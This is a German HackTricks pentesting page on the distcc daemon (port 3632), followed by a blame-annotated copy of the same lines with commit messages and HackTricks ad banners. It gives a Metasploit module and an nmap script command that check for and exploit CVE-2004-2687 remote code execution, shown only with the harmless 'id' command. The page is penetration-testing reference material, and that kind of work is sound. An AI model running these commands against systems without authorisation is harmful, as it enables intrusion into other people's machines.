hacktricks/network-services-pentesting/3632-pentesting-distcc.md

{% hint style="success" %}
Lernen & üben Sie AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Lernen & üben Sie GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Unterstützen Sie HackTricks</summary>

* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)!
* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repos senden.

</details>
{% endhint %}


# Grundinformationen

**Distcc** ist ein Tool, das den **Kompilierungsprozess** verbessert, indem es die **unbenutzte Rechenleistung** anderer Computer im Netzwerk nutzt. Wenn **distcc** auf einem Rechner eingerichtet ist, kann dieser Rechner seine **Kompilierungsaufgaben** an ein anderes System verteilen. Dieses empfangende System muss den **distccd-Daemon** ausführen und einen **kompatiblen Compiler** installiert haben, um den gesendeten Code zu verarbeiten.

**Standardport:** 3632
```
PORT     STATE SERVICE
3632/tcp open  distccd
```
# Exploitation

Überprüfen Sie, ob es anfällig für **CVE-2004-2687** ist, um beliebigen Code auszuführen:
```bash
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
```
# Shodan

_Ich glaube nicht, dass Shodan diesen Dienst erkennt._

# Ressourcen

* [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec)
* [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855)

Beitrag erstellt von **Álex B (@r1p)**


{% hint style="success" %}
Lerne & übe AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Lerne & übe GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Unterstütze HackTricks</summary>

* Überprüfe die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)!
* **Tritt der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folge** uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Teile Hacking-Tricks, indem du PRs zu den** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repos einreichst.

</details>
{% endhint %}
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:20:16 +00:00			`{% hint style="success" %}`
			`Lernen & üben Sie AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Lernen & üben Sie GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:20:16 +00:00			`<details>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:20:16 +00:00			`<summary>Unterstützen Sie HackTricks</summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:20:16 +00:00			`* Überprüfen Sie die [Abonnementpläne](https://github.com/sponsors/carlospolop)!`
			`* Treten Sie der 💬 [Discord-Gruppe](https://discord.gg/hRep4RUj7f) oder der [Telegram-Gruppe](https://t.me/peass) bei oder folgen Sie uns auf Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Teilen Sie Hacking-Tricks, indem Sie PRs an die [HackTricks](https://github.com/carlospolop/hacktricks) und [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repos senden.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:20:16 +00:00			`{% endhint %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00

Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:20:16 +00:00			`# Grundinformationen`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:20:16 +00:00			`Distcc ist ein Tool, das den Kompilierungsprozess verbessert, indem es die unbenutzte Rechenleistung anderer Computer im Netzwerk nutzt. Wenn distcc auf einem Rechner eingerichtet ist, kann dieser Rechner seine Kompilierungsaufgaben an ein anderes System verteilen. Dieses empfangende System muss den distccd-Daemon ausführen und einen kompatiblen Compiler installiert haben, um den gesendeten Code zu verarbeiten.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to German 2024-02-10 15:36:32 +00:00			`Standardport: 3632`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`PORT STATE SERVICE`
			`3632/tcp open distccd`
			```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:20:16 +00:00			`# Exploitation`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to German 2024-02-10 15:36:32 +00:00			`Überprüfen Sie, ob es anfällig für CVE-2004-2687 ist, um beliebigen Code auszuführen:`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```bash
			`msf5 > use exploit/unix/misc/distcc_exec`
Translated ['network-services-pentesting/3632-pentesting-distcc.md'] to 2024-03-11 14:44:42 +00:00			`nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```
fix mess 2 2022-05-01 12:49:36 +00:00			`# Shodan`
GitBook: [master] one page modified 2020-10-05 10:16:52 +00:00
Translated to German 2024-02-10 15:36:32 +00:00			`_Ich glaube nicht, dass Shodan diesen Dienst erkennt._`
GitBook: [master] one page modified 2020-10-05 10:16:52 +00:00
Translated to German 2024-02-10 15:36:32 +00:00			`# Ressourcen`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#2876] save 2021-11-30 16:46:07 +00:00			`* [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec)`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`* [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855)`

Translated ['network-services-pentesting/3632-pentesting-distcc.md'] to 2024-03-11 14:44:42 +00:00			`Beitrag erstellt von Álex B (@r1p)`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:20:16 +00:00

			`{% hint style="success" %}`
			`Lerne & übe AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Lerne & übe GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`

			`<details>`

			`<summary>Unterstütze HackTricks</summary>`

			`* Überprüfe die [Abonnementpläne](https://github.com/sponsors/carlospolop)!`
			`* Tritt der 💬 [Discord-Gruppe](https://discord.gg/hRep4RUj7f) oder der [Telegram-Gruppe](https://t.me/peass) bei oder folge uns auf Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Teile Hacking-Tricks, indem du PRs zu den [HackTricks](https://github.com/carlospolop/hacktricks) und [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repos einreichst.`

			`</details>`
			`{% endhint %}`